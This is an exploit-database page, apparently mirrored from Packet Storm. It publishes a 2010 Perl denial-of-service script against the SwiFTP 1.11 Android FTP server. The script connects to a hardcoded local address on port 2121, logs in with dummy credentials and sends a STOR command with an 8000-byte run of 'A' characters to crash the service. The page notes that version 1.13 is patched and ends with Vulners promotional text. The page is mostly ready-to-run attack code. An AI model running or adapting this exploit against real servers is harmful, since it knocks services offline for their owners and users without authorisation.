Lucene search
K

SwiFTP 1.11 Denial Of Service

🗓️ 14 Jan 2010 00:00:00Reported by Julien BedardType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

SwiFTP 1.11 Denial Of Service exploit for Android ap

Code
`#!/usr/bin/perl  
############  
#  
# Simple Dos Crap for the Android app : SwiFTP Server v1.11  
# by Julien Bedard  
#  
# This DoS have been patched in the new version that's why  
# I'm releasing it.   
#  
# SwiFTP Server v1.11 --> Vulnerable  
# SwiFTP Server v1.13 --> Patched  
#  
####################################  
  
use IO::Socket::INET;  
  
$overflow = 'A' x 8000;  
  
$ftpraw=IO::Socket::INET->new("192.168.2.13:2121") or die;  
  
print $ftpraw "user nouser\n";  
print $ftpraw "pass nopass\n";  
print $ftpraw "stor $overflow\n";  
print $ftpraw "QUIT\n";  
  
close $ftpraw;  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jan 2010 00:00Current
0.3Low risk
Vulners AI Score0.3
22